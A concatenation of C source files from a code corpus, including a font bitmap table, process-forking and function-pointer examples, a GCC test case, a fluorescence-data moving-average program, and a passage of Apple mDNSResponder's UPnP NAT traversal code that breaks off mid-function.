0xdc, /* 11011100 */
0x00, /* 00000000 */
0x76, /* 01110110 */
0xdc, /* 11011100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 248 0xf8 '? */
0x00, /* 00000000 */
0x38, /* 00111000 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x38, /* 00111000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 249 0xf9 '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 250 0xfa '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x18, /* 00011000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 251 0xfb '? */
0x00, /* 00000000 */
0x0f, /* 00001111 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0x0c, /* 00001100 */
0xec, /* 11101100 */
0x6c, /* 01101100 */
0x6c, /* 01101100 */
0x3c, /* 00111100 */
0x1c, /* 00011100 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 252 0xfc '? */
0x00, /* 00000000 */
0x6c, /* 01101100 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x36, /* 00110110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 253 0xfd '? */
0x00, /* 00000000 */
0x3c, /* 00111100 */
0x66, /* 01100110 */
0x0c, /* 00001100 */
0x18, /* 00011000 */
0x32, /* 00110010 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 254 0xfe '? */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x7e, /* 01111110 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
/* 255 0xff '' */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
0x00, /* 00000000 */
};
|
the_stack_data/7949433.c | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>
const int NR_OF_CHILDREN = 2;
int main(void) {
pid_t pids[NR_OF_CHILDREN];
int index;
for (index = 0; index < NR_OF_CHILDREN; index++) {
pids[index] = fork();
if (pids[index] < 0) {
perror("Fork failed!");
exit(-1);
}
if (pids[index] == 0) {
int time = index + 1;
printf("%dº filho criado com o PID = %d (tempo de espera de %d segundos)\n", index+1, getpid(), time);
sleep(time);
exit(time);
}
}
pid_t p;
int status;
for (index = 0; index < NR_OF_CHILDREN; index++) {
p = waitpid(pids[index], &status, 0);
if (WIFEXITED(status)) {
printf("O %dº filho com o PID = %d terminou com valor = %d\n", index+1, p, WEXITSTATUS(status));
}
}
return 0;
} |
the_stack_data/51904.c | /* https://www.geeksforgeeks.org/function-pointer-in-c/ */
#include <stdio.h>
void fun(int a)
{
printf("Value of a is %d\n", a);
}
int main()
{
void (*fun_ptr)(int) = &fun;
/* The above line is equivalent of following two
void (*fun_ptr)(int);
fun_ptr = &fun;
*/
(*fun_ptr)(10);
return 0;
}
|
the_stack_data/153268002.c | /* PR rtl-optimization/64935 */
/* { dg-do compile } */
/* { dg-options "-O -fschedule-insns --param=max-sched-ready-insns=0 -fcompare-debug" } */
/* { dg-require-effective-target scheduling } */
/* { dg-xfail-if "" { powerpc-ibm-aix* } { "*" } { "" } } */
void
foo (int *data, unsigned len, const int qlp_coeff[],
unsigned order, int lp, int residual[], int i)
{
int sum;
sum = 0;
sum += qlp_coeff[1] * data[i - 2];
sum += qlp_coeff[0] * data[i - 1];
residual[i] = data[i] - (sum >> lp);
}
|
the_stack_data/248581575.c | // Mimic a real time system that analyzes fluorescence data
// Input: read one value at a time, from a very large file
// Output: location and width of each peak, median distance between peaks
#include<stdio.h>
#include<stdlib.h>
#define MAX_ITEMS 16
typedef struct circularQueue_s
{
int first;
int last;
int validItems;
int data[MAX_ITEMS];
} circularQueue_t;
void initializeQueue(circularQueue_t *theQueue);
int isEmpty(circularQueue_t *theQueue);
int putItem(circularQueue_t *theQueue, int theItemValue);
int getItem(circularQueue_t *theQueue, int *theItemValue);
void printQueue(circularQueue_t *theQueue);
int main(){
FILE *fp = fopen("FLdata.txt","r");
int N = 15276000;
int W = MAX_ITEMS; // set a moving average window
int thresh = 2*W;
int sum = 0;
int i,ret, dat;
circularQueue_t dataQ;
initializeQueue(&dataQ);
for(i=0;i<W;i++){
fscanf(fp,"%d",&dat);
sum += dat;
putItem(&dataQ, dat);
}
// printf("Sum of %d pts = %d\n",W,sum);
do{
getItem(&dataQ,&dat); // get first item in circular queue
sum = sum - dat;
ret = fscanf(fp,"%d",&dat); // read next item from file
sum = sum + dat;
putItem(&dataQ,dat); // push last item into circuar queue
if(sum > thresh)
printf("%d\t%d\n",i,sum);
i++;
} while(ret!=EOF);
// printf("Read %d data points\n",i);
}
void initializeQueue(circularQueue_t *theQueue)
{
int i;
theQueue->validItems = 0;
theQueue->first = 0;
theQueue->last = 0;
for(i=0; i<MAX_ITEMS; i++)
{
theQueue->data[i] = 0;
}
return;
}
int isEmpty(circularQueue_t *theQueue)
{
if(theQueue->validItems==0)
return(1);
else
return(0);
}
int putItem(circularQueue_t *theQueue, int theItemValue)
{
if(theQueue->validItems>=MAX_ITEMS)
{
printf("The queue is full\n");
printf("You cannot add items\n");
return(-1);
}
else
{
theQueue->validItems++;
theQueue->data[theQueue->last] = theItemValue;
theQueue->last = (theQueue->last+1)%MAX_ITEMS;
return(0);
}
}
int getItem(circularQueue_t *theQueue, int *theItemValue)
{
if(isEmpty(theQueue))
{
printf("isempty\n");
return(-1);
}
else
{
*theItemValue=theQueue->data[theQueue->first];
theQueue->first=(theQueue->first+1)%MAX_ITEMS;
theQueue->validItems--;
return(0);
}
}
void printQueue(circularQueue_t *theQueue)
{
int aux, aux1;
aux = theQueue->first;
aux1 = theQueue->validItems;
while(aux1>0)
{
printf("Element #%d = %d\n", aux, theQueue->data[aux]);
aux=(aux+1)%MAX_ITEMS;
aux1--;
}
return;
}
|
the_stack_data/286352.c | /* -*- Mode: C; tab-width: 4 -*-
*
* Copyright (c) 2004 Apple Computer, Inc. All rights reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#ifdef _LEGACY_NAT_TRAVERSAL_
#include "stdlib.h" // For strtol()
#include "string.h" // For strlcpy(), For strncpy(), strncasecmp()
#include "assert.h" // For assert()
#if defined( WIN32 )
# include <winsock2.h>
# include <ws2tcpip.h>
# define strcasecmp _stricmp
# define strncasecmp _strnicmp
# define mDNSASLLog( UUID, SUBDOMAIN, RESULT, SIGNATURE, FORMAT, ... ) ;
static int
inet_pton( int family, const char * addr, void * dst )
{
struct sockaddr_storage ss;
int sslen = sizeof( ss );
ZeroMemory( &ss, sizeof( ss ) );
ss.ss_family = (ADDRESS_FAMILY)family;
if ( WSAStringToAddressA( (LPSTR)addr, family, NULL, ( struct sockaddr* ) &ss, &sslen ) == 0 )
{
if ( family == AF_INET ) { memcpy( dst, &( ( struct sockaddr_in* ) &ss)->sin_addr, sizeof( IN_ADDR ) ); return 1; }
else if ( family == AF_INET6 ) { memcpy( dst, &( ( struct sockaddr_in6* ) &ss)->sin6_addr, sizeof( IN6_ADDR ) ); return 1; }
else return 0;
}
else return 0;
}
#else
# include <arpa/inet.h> // For inet_pton()
#endif
#include "mDNSEmbeddedAPI.h"
#include "uDNS.h" // For natTraversalHandleAddressReply() etc.
// used to format SOAP port mapping arguments
typedef struct Property_struct
{
char *name;
char *type;
char *value;
} Property;
// All of the text parsing in this file is intentionally transparent so that we know exactly
// what's being done to the text, with an eye towards preventing security problems.
// This is an evolving list of useful acronyms to know. Please add to it at will.
// ST Service Type
// NT Notification Type
// USN Unique Service Name
// UDN Unique Device Name
// UUID Universally Unique Identifier
// URN/urn Universal Resource Name
// Forward declaration because of circular reference:
// SendPortMapRequest -> SendSOAPMsgControlAction -> MakeTCPConnection -> tcpConnectionCallback -> handleLNTPortMappingResponse
// In the event of a port conflict, handleLNTPortMappingResponse then increments tcpInfo->retries and calls back to SendPortMapRequest to try again
mDNSlocal mStatus SendPortMapRequest(mDNS *m, NATTraversalInfo *n);
#define RequestedPortNum(n) (mDNSVal16(mDNSIPPortIsZero((n)->RequestedPort) ? (n)->IntPort : (n)->RequestedPort) + (mDNSu16)(n)->tcpInfo.retries)
// Note that this function assumes src is already NULL terminated
mDNSlocal void AllocAndCopy(mDNSu8 **const dst, const mDNSu8 *const src)
{
if (src == mDNSNULL) return;
if ((*dst = mDNSPlatformMemAllocate((mDNSu32)strlen((char*)src) + 1)) == mDNSNULL)
{ LogMsg("AllocAndCopy: can't allocate string"); return; }
strcpy((char*)*dst, (char*)src);
}
// This function does a simple parse of an HTTP URL that may include a hostname, port, and path
// If found in the URL, addressAndPort and path out params will point to newly allocated space (and will leak if they were previously pointing at allocated space)
mDNSlocal mStatus ParseHttpUrl(const mDNSu8 *ptr, const mDNSu8 *const end, mDNSu8 **const addressAndPort, mDNSIPPort *const port, mDNSu8 **const path)
{
// if the data begins with "http://", we assume there is a hostname and possibly a port number
if (end - ptr >= 7 && strncasecmp((char*)ptr, "http://", 7) == 0)
{
int i;
const mDNSu8 *stop = end;
const mDNSu8 *addrPtr = mDNSNULL;
ptr += 7; //skip over "http://"
if (ptr >= end) { LogInfo("ParseHttpUrl: past end of buffer parsing host:port"); return mStatus_BadParamErr; }
// find the end of the host:port
addrPtr = ptr;
for (i = 0; addrPtr && addrPtr != end; i++, addrPtr++) if (*addrPtr == '/') break;
// allocate the buffer (len i+1 so we have space to terminate the string)
if ((*addressAndPort = mDNSPlatformMemAllocate(i+1)) == mDNSNULL)
{ LogMsg("ParseHttpUrl: can't allocate address string"); return mStatus_NoMemoryErr; }
strncpy((char*)*addressAndPort, (char*)ptr, i);
(*addressAndPort)[i] = '\0';
// find the port number in the string, by looking backwards for the ':'
stop = ptr; // can't go back farther than the original start
ptr = addrPtr; // move ptr to the path part
for (addrPtr--; addrPtr>stop; addrPtr--)
{
if (*addrPtr == ':')
{
addrPtr++; // skip over ':'
*port = mDNSOpaque16fromIntVal((mDNSu16)strtol((char*)addrPtr, mDNSNULL, 10)); // store it properly converted
break;
}
}
}
// ptr should now point to the first character we haven't yet processed
// everything that remains is the path
if (path && ptr < end)
{
if ((*path = mDNSPlatformMemAllocate((mDNSu32)(end - ptr) + 1)) == mDNSNULL)
{ LogMsg("ParseHttpUrl: can't mDNSPlatformMemAllocate path"); return mStatus_NoMemoryErr; }
strncpy((char*)*path, (char*)ptr, end - ptr);
(*path)[end - ptr] = '\0';
}
return mStatus_NoError;
}
enum
{
HTTPCode_NeedMoreData = -1, // No code found in stream
HTTPCode_Other = -2, // Valid code other than those below found in stream
HTTPCode_Bad = -3,
HTTPCode_200 = 200,
HTTPCode_404 = 404,
HTTPCode_500 = 500,
};
mDNSlocal mDNSs16 ParseHTTPResponseCode(const mDNSu8 **const data, const mDNSu8 *const end)
{
const mDNSu8 *ptr = *data;
const mDNSu8 *code;
if (end - ptr < 5) return HTTPCode_NeedMoreData;
if (strncasecmp((char*)ptr, "HTTP/", 5) != 0) return HTTPCode_Bad;
ptr += 5;
// should we care about the HTTP protocol version?
// look for first space, which must come before first LF
while (ptr && ptr != end)
{
if (*ptr == '\n') return HTTPCode_Bad;
if (*ptr == ' ') break;
ptr++;
}
if (ptr == end) return HTTPCode_NeedMoreData;
ptr++;
if (end - ptr < 3) return HTTPCode_NeedMoreData;
code = ptr;
ptr += 3;
while (ptr && ptr != end)
{
if (*ptr == '\n') break;
ptr++;
}
if (ptr == end) return HTTPCode_NeedMoreData;
*data = ++ptr;
if (memcmp((char*)code, "200", 3) == 0) return HTTPCode_200;
if (memcmp((char*)code, "404", 3) == 0) return HTTPCode_404;
if (memcmp((char*)code, "500", 3) == 0) return HTTPCode_500;
LogInfo("ParseHTTPResponseCode found unexpected result code: %c%c%c", code[0], code[1], code[2]);
return HTTPCode_Other;
}
// This function parses the xml body of the device description response from the router. Basically, we look to
// make sure this is a response referencing a service we care about (WANIPConnection or WANPPPConnection),
// look for the "controlURL" header immediately following, and copy the addressing and URL info we need
mDNSlocal void handleLNTDeviceDescriptionResponse(tcpLNTInfo *tcpInfo)
{
mDNS *m = tcpInfo->m;
const mDNSu8 *ptr = tcpInfo->Reply;
const mDNSu8 *end = tcpInfo->Reply + tcpInfo->nread;
const mDNSu8 *stop;
mDNSs16 http_result;
if (!mDNSIPPortIsZero(m->UPnPSOAPPort)) return; // already have the info we need
http_result = ParseHTTPResponseCode(&ptr, end); // Note: modifies ptr
if (http_result == HTTPCode_404) LNT_ClearState(m);
if (http_result != HTTPCode_200)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.DeviceDescription", "noop", "HTTP Result", "HTTP code: %d", http_result);
return;
}
// Always reset our flag to use WANIPConnection. We'll use WANPPPConnection if we find it and don't find WANIPConnection.
m->UPnPWANPPPConnection = mDNSfalse;
// find either service we care about
while (ptr && ptr < end)
{
if ((*ptr & 0xDF) == 'W' && (strncasecmp((char*)ptr, "WANIPConnection:1", 17) == 0)) break;
ptr++;
}
if (ptr == end)
{
ptr = tcpInfo->Reply;
while (ptr && ptr < end)
{
if ((*ptr & 0xDF) == 'W' && (strncasecmp((char*)ptr, "WANPPPConnection:1", 18) == 0))
{
m->UPnPWANPPPConnection = mDNStrue;
break;
}
ptr++;
}
}
if (ptr == mDNSNULL || ptr == end) { LogInfo("handleLNTDeviceDescriptionResponse: didn't find WANIPConnection:1 or WANPPPConnection:1 string"); return; }
// find "controlURL", starting from where we left off
while (ptr && ptr < end)
{
if ((*ptr & 0xDF) == 'C' && (strncasecmp((char*)ptr, "controlURL", 10) == 0)) break; // find the first 'c'; is this controlURL? if not, keep looking
ptr++;
}
if (ptr == mDNSNULL || ptr == end) { LogInfo("handleLNTDeviceDescriptionResponse: didn't find controlURL string"); return; }
ptr += 11; // skip over "controlURL>"
if (ptr >= end) { LogInfo("handleLNTDeviceDescriptionResponse: past end of buffer and no body!"); return; } // check ptr again in case we skipped over the end of the buffer
// find the end of the controlURL element
for (stop = ptr; stop < end; stop++) { if (*stop == '<') { end = stop; break; } }
// fill in default port
m->UPnPSOAPPort = m->UPnPRouterPort;
// free string pointers and set to NULL
if (m->UPnPSOAPAddressString != mDNSNULL)
{
mDNSPlatformMemFree(m->UPnPSOAPAddressString);
m->UPnPSOAPAddressString = mDNSNULL;
}
if (m->UPnPSOAPURL != mDNSNULL)
{
mDNSPlatformMemFree(m->UPnPSOAPURL);
m->UPnPSOAPURL = mDNSNULL;
}
if (ParseHttpUrl(ptr, end, &m->UPnPSOAPAddressString, &m->UPnPSOAPPort, &m->UPnPSOAPURL) != mStatus_NoError) return;
// the SOAPURL should look something like "/uuid:0013-108c-4b3f0000f3dc"
if (m->UPnPSOAPAddressString == mDNSNULL)
{
ptr = tcpInfo->Reply;
while (ptr && ptr < end)
{
if ((*ptr & 0xDF) == 'U' && (strncasecmp((char*)ptr, "URLBase", 7) == 0)) break;
ptr++;
}
if (ptr < end) // found URLBase
{
LogInfo("handleLNTDeviceDescriptionResponse: found URLBase");
ptr += 8; // skip over "URLBase>"
// find the end of the URLBase element
for (stop = ptr; stop < end; stop++) { if (*stop == '<') { end = stop; break; } }
if (ParseHttpUrl(ptr, end, &m->UPnPSOAPAddressString, &m->UPnPSOAPPort, mDNSNULL) != mStatus_NoError)
{
LogInfo("handleLNTDeviceDescriptionResponse: failed to parse URLBase");
}
}
// if all else fails, use the router address string
if (m->UPnPSOAPAddressString == mDNSNULL) AllocAndCopy(&m->UPnPSOAPAddressString, m->UPnPRouterAddressString);
}
if (m->UPnPSOAPAddressString == mDNSNULL) LogMsg("handleLNTDeviceDescriptionResponse: UPnPSOAPAddressString is NULL");
else LogInfo("handleLNTDeviceDescriptionResponse: SOAP address string [%s]", m->UPnPSOAPAddressString);
if (m->UPnPSOAPURL == mDNSNULL) AllocAndCopy(&m->UPnPSOAPURL, m->UPnPRouterURL);
if (m->UPnPSOAPURL == mDNSNULL) LogMsg("handleLNTDeviceDescriptionResponse: UPnPSOAPURL is NULL");
else LogInfo("handleLNTDeviceDescriptionResponse: SOAP URL [%s]", m->UPnPSOAPURL);
}
mDNSlocal void handleLNTGetExternalAddressResponse(tcpLNTInfo *tcpInfo)
{
mDNS *m = tcpInfo->m;
mDNSu16 err = NATErr_None;
mDNSv4Addr ExtAddr;
const mDNSu8 *ptr = tcpInfo->Reply;
const mDNSu8 *end = tcpInfo->Reply + tcpInfo->nread;
mDNSu8 *addrend;
static char tagname[20] = { 'N','e','w','E','x','t','e','r','n','a','l','I','P','A','d','d','r','e','s','s' };
// Array NOT including a terminating nul
// LogInfo("handleLNTGetExternalAddressResponse: %s", ptr);
mDNSs16 http_result = ParseHTTPResponseCode(&ptr, end); // Note: modifies ptr
if (http_result == HTTPCode_404) LNT_ClearState(m);
if (http_result != HTTPCode_200)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.AddressRequest", "noop", "HTTP Result", "HTTP code: %d", http_result);
return;
}
while (ptr < end && strncasecmp((char*)ptr, tagname, sizeof(tagname))) ptr++;
ptr += sizeof(tagname); // Skip over "NewExternalIPAddress"
while (ptr < end && *ptr != '>') ptr++;
ptr += 1; // Skip over ">"
// Find the end of the address and terminate the string so inet_pton() can convert it
// (Might be better to copy this to a local string here -- this is overwriting tcpInfo->Reply in-place
addrend = (mDNSu8*)ptr;
while (addrend < end && (mDNSIsDigit(*addrend) || *addrend == '.')) addrend++;
if (addrend >= end) return;
*addrend = 0;
if (inet_pton(AF_INET, (char*)ptr, &ExtAddr) <= 0)
{
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.AddressRequest", "noop", "inet_pton", "");
LogMsg("handleLNTGetExternalAddressResponse: Router returned bad address %s", ptr);
err = NATErr_NetFail;
ExtAddr = zerov4Addr;
}
if (!err) LogInfo("handleLNTGetExternalAddressResponse: External IP address is %.4a", &ExtAddr);
natTraversalHandleAddressReply(m, err, ExtAddr);
}
mDNSlocal void handleLNTPortMappingResponse(tcpLNTInfo *tcpInfo)
{
mDNS *m = tcpInfo->m;
mDNSIPPort extport = zeroIPPort;
const mDNSu8 *ptr = tcpInfo->Reply;
const mDNSu8 *const end = tcpInfo->Reply + tcpInfo->nread;
NATTraversalInfo *natInfo;
mDNSs16 http_result;
for (natInfo = m->NATTraversals; natInfo; natInfo=natInfo->next) { if (natInfo == tcpInfo->parentNATInfo) break;}
if (!natInfo) { LogInfo("handleLNTPortMappingResponse: can't find matching tcpInfo in NATTraversals!"); return; }
http_result = ParseHTTPResponseCode(&ptr, end); // Note: modifies ptr
if (http_result == HTTPCode_200)
{
LogInfo("handleLNTPortMappingResponse: got a valid response, sending reply to natTraversalHandlePortMapReply(internal %d external %d retries %d)",
mDNSVal16(natInfo->IntPort), RequestedPortNum(natInfo), tcpInfo->retries);
// Make sure to compute extport *before* we zero tcpInfo->retries
extport = mDNSOpaque16fromIntVal(RequestedPortNum(natInfo));
tcpInfo->retries = 0;
natTraversalHandlePortMapReply(m, natInfo, m->UPnPInterfaceID, mStatus_NoError, extport, NATMAP_DEFAULT_LEASE);
}
else if (http_result == HTTPCode_500)
{
while (ptr && ptr != end)
{
if (((*ptr & 0xDF) == 'C' && end - ptr >= 8 && strncasecmp((char*)ptr, "Conflict", 8) == 0) ||
(*ptr == '>' && end - ptr >= 15 && strncasecmp((char*)ptr, ">718</errorCode", 15) == 0))
{
if (tcpInfo->retries < 100)
{
tcpInfo->retries++; SendPortMapRequest(tcpInfo->m, natInfo);
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.PortMapRequest", "noop", "Conflict", "Retry %d", tcpInfo->retries);
}
else
{
LogMsg("handleLNTPortMappingResponse too many conflict retries %d %d", mDNSVal16(natInfo->IntPort), mDNSVal16(natInfo->RequestedPort));
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.PortMapRequest", "noop", "Conflict - too many retries", "Retries: %d", tcpInfo->retries);
natTraversalHandlePortMapReply(m, natInfo, m->UPnPInterfaceID, NATErr_Res, zeroIPPort, 0);
}
return;
}
ptr++;
}
}
else if (http_result == HTTPCode_Bad) LogMsg("handleLNTPortMappingResponse got data that was not a valid HTTP response");
else if (http_result == HTTPCode_Other) LogMsg("handleLNTPortMappingResponse got unexpected response code");
else if (http_result == HTTPCode_404) LNT_ClearState(m);
if (http_result != HTTPCode_200 && http_result != HTTPCode_500)
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.PortMapRequest", "noop", "HTTP Result", "HTTP code: %d", http_result);
}
mDNSlocal void DisposeInfoFromUnmapList(mDNS *m, tcpLNTInfo *tcpInfo)
{
tcpLNTInfo **ptr = &m->tcpInfoUnmapList;
while (*ptr && *ptr != tcpInfo) ptr = &(*ptr)->next;
if (*ptr) { *ptr = (*ptr)->next; mDNSPlatformMemFree(tcpInfo); } // If we found it, cut it from our list and free the memory
}
mDNSlocal void tcpConnectionCallback(TCPSocket *sock, void *context, mDNSBool ConnectionEstablished, mStatus err)
{
mStatus status = mStatus_NoError;
tcpLNTInfo *tcpInfo = (tcpLNTInfo *)context;
mDNSBool closed = mDNSfalse;
long n = 0;
long nsent = 0;
static int LNTERRORcount = 0;
if (tcpInfo == mDNSNULL) { LogInfo("tcpConnectionCallback: no tcpInfo context"); status = mStatus_Invalid; goto exit; }
if (tcpInfo->sock != sock)
{
LogMsg("tcpConnectionCallback: WARNING- tcpInfo->sock(%p) != sock(%p) !!! Printing tcpInfo struct", tcpInfo->sock, sock);
LogMsg("tcpConnectionCallback: tcpInfo->Address:Port [%#a:%d] tcpInfo->op[%d] tcpInfo->retries[%d] tcpInfo->Request[%s] tcpInfo->Reply[%s]",
&tcpInfo->Address, mDNSVal16(tcpInfo->Port), tcpInfo->op, tcpInfo->retries, tcpInfo->Request, tcpInfo->Reply);
}
// The handlers below expect to be called with the lock held
mDNS_Lock(tcpInfo->m);
if (err) { LogInfo("tcpConnectionCallback: received error"); goto exit; }
if (ConnectionEstablished) // connection is established - send the message
{
LogInfo("tcpConnectionCallback: connection established, sending message");
nsent = mDNSPlatformWriteTCP(sock, (char*)tcpInfo->Request, tcpInfo->requestLen);
if (nsent != (long)tcpInfo->requestLen) { LogMsg("tcpConnectionCallback: error writing"); status = mStatus_UnknownErr; goto exit; }
}
else
{
n = mDNSPlatformReadTCP(sock, (char*)tcpInfo->Reply + tcpInfo->nread, tcpInfo->replyLen - tcpInfo->nread, &closed);
LogInfo("tcpConnectionCallback: mDNSPlatformReadTCP read %d bytes", n);
if (n < 0) { LogInfo("tcpConnectionCallback - read returned %d", n); status = mStatus_ConnFailed; goto exit; }
else if (closed) { LogInfo("tcpConnectionCallback: socket closed by remote end %d", tcpInfo->nread); status = mStatus_ConnFailed; goto exit; }
tcpInfo->nread += n;
LogInfo("tcpConnectionCallback tcpInfo->nread %d", tcpInfo->nread);
if (tcpInfo->nread > LNT_MAXBUFSIZE)
{
LogInfo("result truncated...");
tcpInfo->nread = LNT_MAXBUFSIZE;
}
switch (tcpInfo->op)
{
case LNTDiscoveryOp: handleLNTDeviceDescriptionResponse (tcpInfo); break;
case LNTExternalAddrOp: handleLNTGetExternalAddressResponse(tcpInfo); break;
case LNTPortMapOp: handleLNTPortMappingResponse (tcpInfo); break;
case LNTPortMapDeleteOp: status = mStatus_ConfigChanged; break;
default: LogMsg("tcpConnectionCallback: bad tcp operation! %d", tcpInfo->op); status = mStatus_Invalid; break;
}
}
exit:
if (err || status)
{
mDNS *m = tcpInfo->m;
if ((++LNTERRORcount % 1000) == 0)
{
LogMsg("ERROR: tcpconnectioncallback -> got error status %d times", LNTERRORcount);
assert(LNTERRORcount < 1000);
// Recovery Mechanism to bail mDNSResponder out of trouble: It has been seen that we can get into
// this loop: [tcpKQSocketCallback()--> doTcpSocketCallback()-->tcpconnectionCallback()-->mDNSASLLog()],
// if mDNSPlatformTCPCloseConnection() does not close the TCPSocket. Instead of calling mDNSASLLog()
// repeatedly and logging the same error msg causing 100% CPU usage, we
// crash mDNSResponder using assert() and restart fresh. See advantages below:
// 1.Better User Experience
// 2.CrashLogs frequency can be monitored
// 3.StackTrace can be used for more info
}
switch (tcpInfo->op)
{
case LNTDiscoveryOp: if (m->UPnPSOAPAddressString == mDNSNULL)
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.DeviceDescription", "failure", "SOAP Address", "");
if (m->UPnPSOAPURL == mDNSNULL)
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.DeviceDescription", "failure", "SOAP path", "");
if (m->UPnPSOAPAddressString && m->UPnPSOAPURL)
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.DeviceDescription", "success", "success", "");
break;
case LNTExternalAddrOp: mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.AddressRequest",
mDNSIPv4AddressIsZero(m->ExternalAddress) ? "failure" : "success",
mDNSIPv4AddressIsZero(m->ExternalAddress) ? "failure" : "success", "");
break;
case LNTPortMapOp: if (tcpInfo->parentNATInfo)
mDNSASLLog((uuid_t *)&m->asl_uuid, "natt.legacy.PortMapRequest", (tcpInfo->parentNATInfo->Result) ? "failure" : "success",
(tcpInfo->parentNATInfo->Result) ? "failure" : "success", "Result: %d", tcpInfo->parentNATInfo->Result);
break;
case LNTPortMapDeleteOp: break;
default: break;
}
mDNSPlatformTCPCloseConnection(sock);
tcpInfo->sock = mDNSNULL;
if (tcpInfo->Request) { mDNSPlatformMemFree(tcpInfo->Request); tcpInfo->Request = mDNSNULL; }
if (tcpInfo->Reply ) { mDNSPlatformMemFree(tcpInfo->Reply); tcpInfo->Reply = mDNSNULL; }
}
else
{
LNTERRORcount = 0; // clear LNTERRORcount
}
if (tcpInfo) mDNS_Unlock(tcpInfo->m);
if (status == mStatus_ConfigChanged) DisposeInfoFromUnmapList(tcpInfo->m, tcpInfo);
}
mDNSlocal mStatus MakeTCPConnection(mDNS *const m, tcpLNTInfo *info, const mDNSAddr *const Addr, const mDNSIPPort Port, LNTOp_t op)
{
mStatus err = mStatus_NoError;
mDNSIPPort srcport = zeroIPPort;
if (mDNSIPv4AddressIsZero(Addr->ip.v4) || mDNSIPPortIsZero(Port))
{ LogMsg("LNT MakeTCPConnection: bad address/port %#a:%d", Addr, mDNSVal16(Port)); return(mStatus_Invalid); }
info->m = m;
info->Address = *Addr;
info->Port = Port;
info->op = op;
info->nread = 0;
info->replyLen = LNT_MAXBUFSIZE;
if (info->Reply != mDNSNULL) mDNSPlatformMemZero(info->Reply, LNT_MAXBUFSIZE); // reuse previously allocated buffer
else if ((info->Reply = mDNSPlatformMemAllocate(LNT_MAXBUFSIZE)) == mDNSNULL) { LogInfo("can't allocate reply buffer"); return (mStatus_NoMemoryErr); }
if (info->sock) { LogInfo("MakeTCPConnection: closing previous open connection"); mDNSPlatformTCPCloseConnection(info->sock); info->sock = mDNSNULL; }
info->sock = mDNSPlatformTCPSocket(m, kTCPSocketFlags_Zero, &srcport, mDNSfalse);
if (!info->sock) { LogMsg("LNT MakeTCPConnection: unable to create TCP socket"); mDNSPlatformMemFree(info->Reply); info->Reply = mDNSNULL; return(mStatus_NoMemoryErr); }
LogInfo("MakeTCPConnection: connecting to %#a:%d", &info->Address, mDNSVal16(info->Port));
err = mDNSPlatformTCPConnect(info->sock, Addr, Port, mDNSNULL, 0, tcpConnectionCallback, info);
if (err == mStatus_ConnPending) err = mStatus_NoError;
